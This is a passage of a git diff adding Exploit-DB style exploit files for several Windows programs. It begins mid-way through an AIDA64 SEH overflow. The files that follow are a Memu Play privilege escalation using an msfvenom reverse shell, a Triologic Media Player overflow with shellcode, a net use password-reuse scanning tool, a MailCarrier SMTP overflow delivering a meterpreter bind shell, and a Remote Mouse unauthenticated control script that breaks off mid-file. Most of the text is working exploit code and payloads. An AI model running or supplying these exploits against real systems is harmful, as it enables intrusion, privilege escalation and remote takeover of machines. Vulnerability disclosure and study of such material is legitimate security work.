+"\x7a\x4c\x4b\x62\x32\x68\x6b\x6c\x4d\x33\x6d\x51\x7a\x37\x71"
+"\x4e\x6d\x4d\x55\x38\x32\x75\x50\x77\x70\x63\x30\x50\x50\x55"
+"\x38\x66\x51\x6e\x6b\x62\x4f\x6c\x47\x39\x6f\x59\x45\x4f\x4b"
+"\x78\x70\x58\x35\x49\x32\x52\x76\x53\x58\x4c\x66\x6c\x55\x6d"
+"\x6d\x4d\x4d\x79\x6f\x59\x45\x65\x6c\x46\x66\x51\x6c\x64\x4a"
+"\x4f\x70\x39\x6b\x59\x70\x64\x35\x47\x75\x6d\x6b\x73\x77\x66"
+"\x73\x42\x52\x42\x4f\x62\x4a\x75\x50\x31\x43\x59\x6f\x5a\x75"
+"\x51\x73\x33\x51\x62\x4c\x55\x33\x46\x4e\x70\x65\x70\x78\x53"
+"\x55\x65\x50\x41\x41"
+)
+
+# Align the registers
+# ESI = 04aaefc0, Buffer = 04abfb6c. Buffer - ESI = 0x010b8d
+align_eax = (
+                "\x56"                      # PUSH ESI
+                "\x58"                      # POP EAX
+                "\x66\x05\x3f\x10"          # ADD AX,0x103f # EAX = 0x04aaffff
+                "\x40"                      # INC EAX       # EAX = 0x04ab0000
+                "\x66\x05\x01\x7F"          # ADD AX,0x7f01 # EAX = 0x04ab7f01
+                "\x66\x05\x6b\x7c"          # ADD AX,0x7c6b # EAX = 0x04abfb6c
+                "\x50"                      # PUSH EAX
+)
+
+# Offsets
+crash_ebp = 307
+crash_esi = 1583
+crash_seh = 319
+crash_nseh = crash_seh - 4
+
+# Variables
+ascii_nop = "\x47"                                              # Doesn't do anything particular for this program
+nops = ascii_nop * 32                                           # ASCII NOP's amount
+
+# Prefix
+prefix = "A" * crash_nseh
+nseh = "\x71\x06\x70\x04"                                       # JNO SHORT # JO SHORT # Jump over NSEH/SEH
+seh = struct.pack("<L", 0x0121076e)                             # POP POP RET   # aida64.exe
+suffix = align_eax                                              # Align registers to execute shellcode
+suffix += nops                                                  # Some ASCII friendly NOP's
+suffix += shellcode                                             # Magic!
+suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))    # Filler
+
+# Concatenate string for payload
+payload = prefix + nseh + seh + suffix                          # Put it all together
+
+try:
+    file = open(filename,"wb")
+    file.write(payload)
+    file.close()
+    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
+except:
+    print "[!] Error creating file!"
+    sys.exit(0)
\ No newline at end of file
diff --git a/exploits/windows/local/48283.txt b/exploits/windows/local/48283.txt
new file mode 100644
index 000000000..f6b3529a0
--- /dev/null
+++ b/exploits/windows/local/48283.txt
@@ -0,0 +1,70 @@
+# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions
+# Discovery by: chuyreds
+# Discovery Date: 2020-03-08
+# Vendor Homepage: https://www.memuplay.com/
+# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
+# Tested Version: 7.1.3
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Description:
+#  Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions
+
+# Prerequisites
+# Local, Low privilege access with restart capabilities
+
+# Details
+# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.  
+# A low privilege account is able to rename the MemuService.exe file located in this same path and replace 
+# with a malicious file that would connect back to an attacking computer giving system level privileges 
+# (nt authority\system) due to the service running as Local System.  
+# While a low privilege user is unable to restart the service through the application, a restart of the 
+# computer triggers the execution of the malicious file.
+
+C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
+C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
+                                                      BUILTIN\Administradores:(I)(F)
+                                                      BUILTIN\Usuarios:(I)(F)
+                                                      NT AUTHORITY\SYSTEM:(I)(F)
+                                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+                                                      APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
+
+Se procesaron correctamente 1 archivos; error al procesar 0 archivos
+
+
+C:\>sc qc MEmuSVC
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: MEmuSVC
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : MEmuSVC
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+# Proof of Concept
+
+1. Generate malicious .exe on attacking machine
+    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe
+
+2. Setup listener and ensure apache is running on attacking machine
+    nc -lvp 443
+    service apache2 start
+
+3. Download malicious .exe on victim machine
+    Open browser to http://192.168.1.130/MemuService.exe and download
+
+4. Overwrite file and copy malicious .exe.
+    Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
+    Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\
+
+5. Restart victim machine
+
+6. Reverse Shell on attacking machine opens
+    C:\Windows\system32>whoami
+    whoami
+    nt authority\system
\ No newline at end of file
diff --git a/exploits/windows/local/48293.py b/exploits/windows/local/48293.py
new file mode 100755
index 000000000..13ca75c29
--- /dev/null
+++ b/exploits/windows/local/48293.py
@@ -0,0 +1,79 @@
+# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
+# Date: 2020-04-04
+# Author: Felipe Winsnes
+# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
+# Version: 8
+# Tested on: Windows 7 (x86)
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file called "poc.m3l".
+# 2.- Open the Application.
+# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
+# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
+# 5.- Select the file "poc.m3l".
+# 6.- Profit.
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread 
+# Payload size: 512 bytes
+
+buf =  b""
+buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
+buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
+buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
+buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
+buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
+buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
+buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
+buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
+buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
+buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72"
+buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70"
+buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b"
+buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64"
+buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51"
+buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c"
+buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57"
+buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a"
+buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71"
+buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62"
+buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69"
+buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62"
+buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71"
+buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73"
+buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d"
+buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f"
+buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b"
+buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a"
+buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54"
+buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f"
+buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b"
+buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62"
+buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50"
+buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46"
+buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38"
+buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d"
+buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70"
+buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52"
+buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43"
+buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f"
+buf += b"\x75\x4d\x30\x41\x41"
+
+nseh = "\x71\x41"
+seh = "\x41\x4a"
+
+alignment = ""
+alignment += "\x54\x71"       # push ebx, padding
+alignment += "\x58\x71"       # pop eax, padding
+alignment += "\x05\x20\x22"   # add eax, 0x22002000
+alignment += "\x71"           # Padding
+alignment += "\x2D\x19\x22"   # sub eax, 0x22001900
+alignment += "\x71"           # Padding
+alignment += "\x50\x71"       # push eax, padding
+alignment += "\xC3"           # retn
+
+buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000
+f = open ("poc.m3l", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48299.txt b/exploits/windows/local/48299.txt
new file mode 100644
index 000000000..654d0b495
--- /dev/null
+++ b/exploits/windows/local/48299.txt
@@ -0,0 +1,313 @@
+# Title: Microsoft NET USE win10 - Insufficient Authentication Logic
+# Date: 2020-04-04
+# Author: hyp3rlinx
+# Vendor: www.microsoft.com
+# CVE: N/A
+
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows "net use" Command
+
+Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections.
+The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.
+
+
+[Vulnerability Type]
+Insuffient Password Prompt
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account
+is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately
+we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to
+has other vulnerabilities present.
+
+In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected.
+The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation.
+Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less.
+
+Requirements:
+1) Remote system built-in Administrator account is enabled
+2) Origination system users account password and the remote system Administrator passwords match (reuse).
+
+Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case.
+Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue.
+
+However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails.
+Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry.
+
+Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections
+and try them and if theres password reuse (likely) BOOM automagic logon.
+
+This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used.
+When testing make sure to logout then log back in after changing passwords so the environment is clean.
+
+e.g.
+
+1) Passwords for both systems are different and remote built-in Administrator account active:
+
+C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
+
+Enter the password for 'Administrator' to connect to '192.168.x.x':
+System error 5 has occurred.
+
+Access is denied.
+
+2) Passwords for both origination system and remote match:
+
+C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
+The command completed successfully.
+
+By the way as a side note DCERPC calls work as well, if both systems happen to have same password.
+c:\>getmac /s x.x.x.x /U Administrator
+
+MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same."
+Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box?
+
+Expected result: Consistent password dialog box, no matter if passwords match or not.
+Actual Result: No prompt for a password if both systems passwords are the same.
+
+Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC.
+
+
+[Exploit/POC]
+import os,re,time,signal,sys
+from subprocess import *
+from multiprocessing import Process
+
+#By John Page (aka hyp3rlinx)
+#Apparition Security
+#twitter.com/hyp3rlinx
+#-----------------------------------
+#When a remote systems built-in Administrator account is enabled and both the remote and the target system
+#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically.
+#
+#MountPoints2 and Terminal server client hints in the Windows registry can help us.
+#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously.
+#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons)
+#MountPoints2 key entries are stored like '##10.2.1.40#c$'
+#-----------------------------------------------------------
+
+BANNER="""
+    _   ______________   ___    ____  __  _______ ______
+   / | / / ____/_  __/  /   |  / __ )/ / / / ___// ____/
+  /  |/ / __/   / /    / /| | / __  / / / /\__ \/ __/   
+ / /|  / /___  / /    / ___ |/ /_/ / /_/ /___/ / /___   
+/_/ |_/_____/ /_/    /_/  |_/_____/\____//____/_____/   
+
+                                          By Hyp3rlinx
+                                          ApparitionSec
+"""
+
+DRIVE="X"
+FINDME="The command completed successfully."
+REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"'
+REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s"
+VULN_FOUND=set()
+DELAY=2   #Any lower and we may get inaccurate results.
+rdp_server_lst=[]
+
+#Return prior network logons to remote systems.
+def mountpoints2():
+    mntpoint2_connections=[]
+    try:
+        p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True)
+        tmp = p.stdout.readlines()
+    except Exception as e:
+        print("[!] "+str(e))
+        return False
+    for x in tmp:
+        idx = x.find("##")
+        clean = x[idx:]
+        idx2 = clean.rfind("#")
+        ip = clean[2:idx2]
+        ip = re.sub(r"#.*[A-Z,a-z]","",ip)
+        if ip not in mntpoint2_connections:
+            mntpoint2_connections.append(ip)
+        mntpoint2_connections = list(filter(None, mntpoint2_connections))
+    p.kill()
+    return mntpoint2_connections
+
+ 
+#Terminal server client stores remote server connections.
+def rdp_svrs():
+    global rdp_server_lst
+    try:
+        p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True)
+        tmp = p.stdout.readlines()
+        for key in tmp:
+            if key.find("Servers")!=-1:
+                pos = key.rfind("\\")
+                srv = key[pos + 1:].replace("\r\n","").strip()
+                rdp_server_lst.append(srv)
+        p.kill()
+    except Exception as e:
+        print("[!] "+str(e))
+        return False
+    return True
+
+
+#Disconnect
+def del_vuln_connection(ip):
+    try:
+        print("[!] Disconnecting vuln network logon connection.\n")
+        call(r"net use "+DRIVE+":"+" /del")
+    except Exception as e:
+        print("[!] "+str(e))
+
+
+#Check connection
+def chk_connection(ip):
+    print("[+] Testing: "+ip)
+    sys.stdout.flush()
+    cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True)
+    stderr, stdout = cmd.communicate()
+    if "Reply from" in stderr and "Destination host unreachable" not in stderr:
+        print("[*] Target up!")
+        return True
+    else:
+        print("[!] Target unreachable :(")
+    return False
+
+ 
+#Test vuln
+def Test_Password_Reuse(ip):
+    print("[+] Testing "+ip + " the builtin Administrator account.\n")
+    sys.stdout.flush()
+    try:
+        p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True)
+        err = p.stderr.readlines()
+    
+        if err:
+            e = str(err)
+            if e.find("error 53")!=-1:
+                print("[*] Network path not found\n")
+                return
+            elif e.find("error 1219")!=-1:
+                print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n")
+                return
+            elif e.find("error 85")!=-1:
+                print("[*] The local device name is already in use.\n")
+                return
+            else:
+                print(e+"\n")
+                
+        tmp = p.stdout.read()
+
+        if FINDME in tmp:
+            print("[*] Password reuse for the built-in Administrator found!")
+            print("[+] Connected to target: "+ ip)
+            VULN_FOUND.add(ip+":Administrator")
+            del_vuln_connection(ip)
+        p.kill()
+    except Exception as e:
+        print("[!] "+str(e))
+
+
+
+#Authenticate
+def auth(ip):
+    action_process = Process(target=Test_Password_Reuse, args=(ip,))
+    action_process.start()
+    action_process.join(timeout=5)
+    action_process.terminate()
+
+
+if __name__ == "__main__":
+
+    print(BANNER)
+    print("[+] Windows 'net use' Network Logon Type-3")
+    print("[+] Insufficient Password Prompt")
+    print("[+] By hyp3rlinx\n")
+    
+    time.sleep(3)
+    
+    print("[+] Deleting any existing network logons to start clean.")
+    
+    #Make sure no exist sessions already exist.
+    call(r"net use * /del /y")
+    sys.stdout.flush()
+    time.sleep(1)
+
+    
+    #Grab previous connections from MountPoints2 if any.
+    rdp_svrs()
+    svrlst=mountpoints2()
+
+    if svrlst:
+        svrlst + rdp_server_lst
+    else:
+        svrlst = rdp_server_lst
+    
+    if not svrlst:
+        print("[*] No MountPoints2 artifacts found, enter an IP.")
+        sys.stdout.flush()
+        ip=raw_input("[+] Target IP> ")
+        if chk_connection(ip):
+             auth(ip)
+    else:
+        #We have MountPoints2 or RDP Server list IP we can try.
+        for ip in svrlst:
+            if chk_connection(ip):
+                 auth(ip)
+                 
+            time.sleep(DELAY)
+ 
+
+    if len(VULN_FOUND) != 0:
+        print("[*] Located the following vulnerable systems:")
+        sys.stdout.flush()
+        for v in VULN_FOUND:
+            print("[+] "+v)
+    else:
+        print("[+] All previous attempts failed, enter an IP and give it a shot!.")
+        sys.stdout.flush()
+        ip=raw_input("[+] Target IP> ")
+        if chk_connection(ip):
+             auth(ip)
+
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=Je93Neb0k8g
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: February 28, 2020
+MSRC "behavior you are reporting is by design" : March 30, 2020
+April 5, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/remote/46695.py b/exploits/windows/remote/46695.py
new file mode 100755
index 000000000..746bf286b
--- /dev/null
+++ b/exploits/windows/remote/46695.py
@@ -0,0 +1,84 @@
+#!/usr/bin/python
+# Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote)
+# Date: 12/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Software Link: N.A
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP Prof SP3 ENG x86
+# CVE: TBC from Mitre
+# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
+#0x7e4456f7 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
+#POC
+#1.) Change ip and port in code
+#2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
+import sys
+import socket
+import time
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
+shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x79\x6c\x6a\x48\x4d\x52\x57\x70\x45\x50\x65\x50\x55\x30\x6e"
+"\x69\x6a\x45\x55\x61\x39\x50\x32\x44\x4e\x6b\x76\x30\x44\x70"
+"\x4e\x6b\x42\x72\x76\x6c\x6c\x4b\x51\x42\x47\x64\x6e\x6b\x44"
+"\x32\x44\x68\x56\x6f\x4c\x77\x43\x7a\x57\x56\x34\x71\x6b\x4f"
+"\x6c\x6c\x37\x4c\x73\x51\x61\x6c\x75\x52\x74\x6c\x35\x70\x49"
+"\x51\x68\x4f\x76\x6d\x56\x61\x6a\x67\x4a\x42\x7a\x52\x62\x72"
+"\x53\x67\x4c\x4b\x72\x72\x54\x50\x4c\x4b\x63\x7a\x75\x6c\x4e"
+"\x6b\x70\x4c\x72\x31\x73\x48\x4b\x53\x31\x58\x63\x31\x68\x51"
+"\x43\x61\x6e\x6b\x72\x79\x77\x50\x46\x61\x5a\x73\x6e\x6b\x32"
+"\x69\x64\x58\x6d\x33\x35\x6a\x32\x69\x4e\x6b\x67\x44\x4c\x4b"
+"\x75\x51\x39\x46\x30\x31\x69\x6f\x4c\x6c\x4f\x31\x6a\x6f\x64"
+"\x4d\x36\x61\x79\x57\x74\x78\x4d\x30\x32\x55\x7a\x56\x75\x53"
+"\x73\x4d\x48\x78\x67\x4b\x61\x6d\x64\x64\x74\x35\x6b\x54\x72"
+"\x78\x6e\x6b\x71\x48\x54\x64\x33\x31\x38\x53\x72\x46\x4c\x4b"
+"\x44\x4c\x50\x4b\x6e\x6b\x71\x48\x55\x4c\x65\x51\x48\x53\x4e"
+"\x6b\x54\x44\x4e\x6b\x76\x61\x5a\x70\x6f\x79\x57\x34\x76\x44"
+"\x46\x44\x61\x4b\x31\x4b\x63\x51\x50\x59\x50\x5a\x32\x71\x79"
+"\x6f\x59\x70\x51\x4f\x71\x4f\x70\x5a\x6e\x6b\x34\x52\x68\x6b"
+"\x6c\x4d\x33\x6d\x53\x58\x74\x73\x44\x72\x67\x70\x53\x30\x52"
+"\x48\x52\x57\x53\x43\x36\x52\x53\x6f\x61\x44\x50\x68\x72\x6c"
+"\x31\x67\x55\x76\x64\x47\x6b\x4f\x78\x55\x68\x38\x6c\x50\x67"
+"\x71\x63\x30\x45\x50\x64\x69\x4f\x34\x62\x74\x50\x50\x72\x48"
+"\x54\x69\x4f\x70\x42\x4b\x67\x70\x49\x6f\x6e\x35\x50\x6a\x46"
+"\x6b\x56\x39\x62\x70\x78\x62\x79\x6d\x42\x4a\x53\x31\x61\x7a"
+"\x56\x62\x43\x58\x49\x7a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x79"
+"\x45\x4f\x67\x73\x58\x56\x62\x57\x70\x67\x71\x4f\x4b\x4b\x39"
+"\x4b\x56\x50\x6a\x56\x70\x66\x36\x63\x67\x62\x48\x4a\x62\x6b"
+"\x6b\x67\x47\x55\x37\x6b\x4f\x5a\x75\x6f\x75\x49\x50\x33\x45"
+"\x53\x68\x53\x67\x31\x78\x6f\x47\x6b\x59\x70\x38\x49\x6f\x59"
+"\x6f\x38\x55\x66\x37\x33\x58\x61\x64\x68\x6c\x65\x6b\x38\x61"
+"\x79\x6f\x4b\x65\x66\x37\x4e\x77\x52\x48\x73\x45\x62\x4e\x62"
+"\x6d\x65\x31\x79\x6f\x7a\x75\x70\x6a\x55\x50\x73\x5a\x36\x64"
+"\x71\x46\x56\x37\x72\x48\x56\x62\x38\x59\x4b\x78\x61\x4f\x69"
+"\x6f\x69\x45\x4f\x73\x5a\x58\x63\x30\x51\x6e\x66\x4d\x4e\x6b"
+"\x74\x76\x72\x4a\x47\x30\x51\x78\x57\x70\x76\x70\x63\x30\x65"
+"\x50\x33\x66\x50\x6a\x37\x70\x30\x68\x31\x48\x49\x34\x51\x43"
+"\x5a\x45\x49\x6f\x59\x45\x4e\x73\x76\x33\x70\x6a\x33\x30\x76"
+"\x36\x52\x73\x53\x67\x52\x48\x66\x62\x6e\x39\x58\x48\x33\x6f"
+"\x69\x6f\x4a\x75\x4d\x53\x7a\x58\x43\x30\x73\x4e\x73\x37\x47"
+"\x71\x58\x43\x77\x59\x49\x56\x52\x55\x6d\x39\x5a\x63\x4f\x4b"
+"\x68\x70\x6e\x55\x6e\x42\x63\x66\x33\x5a\x33\x30\x50\x53\x69"
+"\x6f\x58\x55\x41\x41")
+
+buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 20 + shellcode + "B" * 100
+
+print "[*] Sending pwnage buffer: with %s bytes" %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 25))
+print s.recv(1024)
+s.send('EHLO root@telspace.co.za \r\n')
+print s.recv(1024)
+s.send('MAIL FROM: pwnz@telspace.co.za \r\n')
+print s.recv(1024)
+s.send('RCPT TO: '+ buffer + '\r\n')
+print s.recv(1024)
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, but if you get here the exploit failed!"
\ No newline at end of file
diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py
new file mode 100755
index 000000000..7c881a738
--- /dev/null
+++ b/exploits/windows/remote/46697.py
@@ -0,0 +1,135 @@
+# Exploit Title: Remote Mouse 3.008 - Failure to Authenticate
+# Date: 2019-09-04
+# Exploit Author: 0rphon
+# Software Link: https://www.remotemouse.net/
+# Version: 3.008
+# Tested on: Windows 10
+
+Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
+This script pops calc as proof of concept (albeit a bit slowly)
+It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
+
+
+#!/usr/bin/python2
+from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
+from time import sleep
+from sys import argv
+
+def Ping(ip):
+    try:
+        target = socket(AF_INET, SOCK_STREAM)
+        target.settimeout(5)
+        target.connect((ip, 1978))
+        response=target.recv(1048)
+        target.close()
+        if response=="SIN 15win nop nop 300":
+            return True
+        else: return False
+    except:
+        print("ERROR: Request timed out")
+
+
+
+def MoveMouse(x,y,ip):
+    def SendMouse(command,times,ip):
+        for x in range(times):
+            target = socket(AF_INET, SOCK_DGRAM)
+            target.sendto(command,(ip,1978))
+            sleep(0.001)
+    if x>0:
+        command="mos  5m 1 0"
+        SendMouse(command,x,ip)
+    elif x<0:
+        x=x*-1
+        command="mos  5m -1 0"
+        SendMouse(command,x,ip)
+    if y>0:
+        command="mos  5m 0 1"
+        SendMouse(command,y,ip)
+    elif y<0:
+        y=y*-1
+        command="mos  6m 0 -1"
+        SendMouse(command,y,ip)
+
+
+
+def MousePress(command,ip,action="click"):
+    if action=="down":
+        target = socket(AF_INET, SOCK_DGRAM)
+        target.sendto((command+" d"),(ip,1978))
+    elif action=="up":
+        target = socket(AF_INET, SOCK_DGRAM)
+        target.sendto((command+" u"),(ip,1978))
+    elif action=="click":
+        target = socket(AF_INET, SOCK_DGRAM)
+        target.sendto((command+" d"),(ip,1978))
+        target.sendto((command+" u"),(ip,1978))
+    else: raise Exception('MousePress: No action named "'+str(action)+'"')
+
+
+def SendString(string,ip):
+    for char in string:
+        target = socket(AF_INET, SOCK_DGRAM)
+        target.sendto(characters[char],(ip,1978))
+    
+
+
+class mouse:
+    leftClick="mos  5R l"
+    rightClick="mos  5R r"
+    middleClick="mos  5R m"
+
+characters={
